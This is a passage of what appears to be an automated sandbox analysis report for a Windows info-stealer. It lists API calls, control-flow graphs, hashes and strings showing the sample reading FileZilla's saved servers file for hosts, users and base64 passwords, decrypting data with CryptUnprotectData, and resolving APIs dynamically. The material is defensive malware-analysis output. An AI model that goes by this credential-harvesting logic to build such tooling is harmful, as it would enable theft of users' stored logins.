                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3e8ee039c0baa52381bc867147264b9e0472758f99ecf5fc77eb662dd471fe6c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C7F06770E047289BDB309B64DD49FA9737ABB44311F0002D5EA0AE3291DB749E858F97
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00409564
                                                                                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 00409583
                                                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 004095AF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Local$AllocCryptDataFreeUnprotect
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2068576380-0
                                                                                                                                                                                                                                              • Opcode ID: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                              • Instruction ID: 845aa5354f8c35be15d3c308e338542aeef751caf2e905b87ee6994bb5fcaacd
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 22788d86bb0e3b36a7a96175dcc17964957ca332b329b0ec9e9903d4a9c63904
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B11B7B8A00609EFCB04DF94C984AAEB7B5FF88301F104559E915A7390D774AE51CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00401177,04083828,004136EB,0041D6E3), ref: 004143CD
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                                                                                                                                                              • GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Heap$AllocNameProcessUser
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 1206570057-0
                                                                                                                                                                                                                                              • Opcode ID: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                              • Instruction ID: fd22aaf49eebc4deedfa71bce2fb200d05227bfc9b63873cd8cb515d50d954e6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 19f43c5935948d257337b5cfe167422182bb8e9e8b16b88c7073f3e19bcb2857
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CE08CB490070CFFCB20EFE4DC49E9CBBB8AB08312F000184FA09E3280DB7056848B91
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 0040113E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExitInfoProcessSystem
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 752954902-0
                                                                                                                                                                                                                                              • Opcode ID: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                              • Instruction ID: 30efb513975bfe185fa80fb3a8f84b393628ccfbb0aa9170a1b214bc368b0093
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0c78e0eb242a3f19764e03ad46aab426447ce2b04c76b8959ffb9729e3075d63
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B6D05E7490020C8BCB14DFE09A496DDBBB9AB8D711F001455DD0572240DA305441CA65
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0098967F,?,00413068,?), ref: 004070F4
                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00413068,?), ref: 004070FB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04083DF0), ref: 004072AB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004072BF
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004072D3
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004072E7
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086820), ref: 004072FB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086838), ref: 0040730F
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086700), ref: 00407322
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086850), ref: 00407336
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,040870B0), ref: 0040734A
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040735E
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407372
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407386
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086820), ref: 00407399
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086838), ref: 004073AD
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086700), ref: 004073C1
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086850), ref: 004073D4
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04087118), ref: 004073E8
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004073FC
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407410
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407424
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086820), ref: 00407438
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086838), ref: 0040744B
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086700), ref: 0040745F
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086850), ref: 00407473
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04087180), ref: 00407486
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040749A
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004074AE
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004074C2
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086820), ref: 004074D6
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086838), ref: 004074EA
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086700), ref: 004074FD
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086850), ref: 00407511
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,040871E8), ref: 00407525
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407539
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0040754D
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00407561
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086820), ref: 00407574
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086838), ref: 00407588
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086700), ref: 0040759C
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086850), ref: 004075AF
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04087250), ref: 004075C3
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004075D7
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004075EB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004075FF
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086820), ref: 00407613
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086838), ref: 00407626
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086700), ref: 0040763A
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086850), ref: 0040764E
                                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,0041DEB8), ref: 00406FD6
                                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,00000000), ref: 00407018
                                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020, : ), ref: 0040702A
                                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,00000000), ref: 0040705F
                                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,0041DEC0), ref: 00407070
                                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,00000000), ref: 004070A3
                                                                                                                                                                                                                                                • Part of subcall function 00406FA0: lstrcat.KERNEL32(36BF7020,0041DEC4), ref: 004070BD
                                                                                                                                                                                                                                                • Part of subcall function 00406FA0: task.LIBCPMTD ref: 004070CB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04083B88), ref: 004077DB
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,04086A58), ref: 004077EE
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(36BF7020), ref: 004077FB
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(36BF7020), ref: 0040780B
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
                                                                                                                                                                                                                                                • Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,04083B38), ref: 00404ED9
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$Heap$AllocateInternetOpenProcesslstrcpytask
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3958002797-0
                                                                                                                                                                                                                                              • Opcode ID: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
                                                                                                                                                                                                                                              • Instruction ID: 3e78b0701875fb024adfa953bd7607f570b92d72e3b87f8e208063dda3fe5bd2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 71a07dda988696830ba42ff86637ae7152b3adc93f1422aa4a5be7619d59b96e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D33234B6D01A14ABCB35EBA0DC89DDE737DAB48704F404699B20A66090DF78E7C5CF94
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 187 40ea90-40eb22 call 416d40 call 4154e0 call 416f20 call 416ea0 call 416e00 * 2 call 416fb0 call 416ea0 call 416e00 call 416da0 call 4093a0 209 40eb27-40eb2c 187->209 210 40ef60-40ef73 call 416e00 call 413220 209->210 211 40eb32-40eb49 call 415530 209->211 211->210 216 40eb4f-40ebaf strtok_s call 416d40 * 4 GetProcessHeap HeapAlloc 211->216 227 40ebb2-40ebb6 216->227 228 40eeca-40ef5b lstrlen call 416da0 call 401500 call 404dc0 call 416e00 memset call 417040 * 4 call 416e00 * 4 227->228 229 40ebbc-40ebcd StrStrA 227->229 228->210 231 40ec06-40ec17 StrStrA 229->231 232 40ebcf-40ec01 lstrlen call 414fa0 call 416ea0 call 416e00 229->232 234 40ec50-40ec61 StrStrA 231->234 235 40ec19-40ec4b lstrlen call 414fa0 call 416ea0 call 416e00 231->235 232->231 239 40ec63-40ec95 lstrlen call 414fa0 call 416ea0 call 416e00 234->239 240 40ec9a-40ecab StrStrA 234->240 235->234 239->240 243 40ecb1-40ed03 lstrlen call 414fa0 call 416ea0 call 416e00 call 4170d0 call 4094a0 240->243 244 40ed39-40ed4b call 4170d0 lstrlen 240->244 243->244 290 40ed05-40ed34 call 416e20 call 416fb0 call 416ea0 call 416e00 243->290 261 40ed51-40ed63 call 4170d0 lstrlen 244->261 262 40eeaf-40eec5 strtok_s 244->262 261->262 274 40ed69-40ed7b call 4170d0 lstrlen 261->274 262->227 274->262 283 40ed81-40ed93 call 4170d0 lstrlen 274->283 283->262 291 40ed99-40eeaa lstrcat * 3 call 4170d0 lstrcat * 2 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 4170d0 lstrcat * 3 call 416e20 * 4 283->291 290->244 291->262
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                • Part of subcall function 004154E0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 0041550B
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
                                                                                                                                                                                                                                                • Part of subcall function 004093A0: FindCloseChangeNotification.KERNEL32(000000FF), ref: 0040947A
                                                                                                                                                                                                                                                • Part of subcall function 00415530: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00415552
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 0040EBA2
                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                                                                                                                                                                • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                                                                                                                                                                • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040EF17
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$ChangeCloseCreateFindFolderFreeNotificationPathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                                                                                              • API String ID: 1266801029-555421843
                                                                                                                                                                                                                                              • Opcode ID: cab5d478a700550077d3886c2a1706362e5d885cf538c2e79374ea94af899fbf
                                                                                                                                                                                                                                              • Instruction ID: d9186ee441f73b04c887f2efee86d04259a2264df0fa853aa1509dbc15227f06
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cab5d478a700550077d3886c2a1706362e5d885cf538c2e79374ea94af899fbf
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3FD174B5D00208ABCB14EBF1DD56EEE7739AF44304F50851EF106B6095DF38AA85CBA8
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                              control_flow_graph 322 415ed0-415ee4 call 415dc0 325 416103-416162 LoadLibraryA * 5 322->325 326 415eea-4160fe call 415df0 GetProcAddress * 21 322->326 327 416164-416178 GetProcAddress 325->327 328 41617d-416184 325->328 326->325 327->328 330 4161b6-4161bd 328->330 331 416186-4161b1 GetProcAddress * 2 328->331 333 4161d8-4161df 330->333 334 4161bf-4161d3 GetProcAddress 330->334 331->330 335 4161e1-4161f4 GetProcAddress 333->335 336 4161f9-416200 333->336 334->333 335->336 337 416231-416232 336->337 338 416202-41622c GetProcAddress * 2 336->338 338->337
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,0406ADE0), ref: 00415F11
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,0406AD80), ref: 00415F2A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,0406ADB0), ref: 00415F42
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,0406AA68), ref: 00415F5A
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083720), ref: 00415F73
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04082AC0), ref: 00415F8B
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04068308), ref: 00415FA3
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04068028), ref: 00415FBC
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083738), ref: 00415FD4
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083768), ref: 00415FEC
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083780), ref: 00416005
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083750), ref: 0041601D
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04068188), ref: 00416035
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040836C0), ref: 0041604E
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040836D8), ref: 00416066
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04068248), ref: 0041607E
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,040836F0), ref: 00416097
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083708), ref: 004160AF
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04068008), ref: 004160C7
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04083450), ref: 004160E0
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77190000,04068268), ref: 004160F8
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04083480,?,004136C0), ref: 0041610A
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(04083558,?,004136C0), ref: 0041611B
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(040834B0,?,004136C0), ref: 0041612D
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(040833C0,?,004136C0), ref: 0041613F
                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(040835A0,?,004136C0), ref: 00416150
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(76850000,04083498), ref: 00416172
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77040000,040833D8), ref: 00416193
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(77040000,04083570), ref: 004161AB
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75A10000,04083600), ref: 004161CD
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(75690000,04068048), ref: 004161EE
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(776F0000,04082BA0), ref: 0041620F
                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(776F0000,NtQueryInformationProcess), ref: 00416226
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 0000000A.00000002.1685757276.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000447000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000549000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000624000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 0000000A.00000002.1685757276.0000000000636000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_10_2_400000_u48o.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                              • String ID: F(t$NtQueryInformationProcess
                                                                                                                                                                                                                                              • API String ID: 2238633743-4113152680
                                                                                                                                                                                                                                              • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
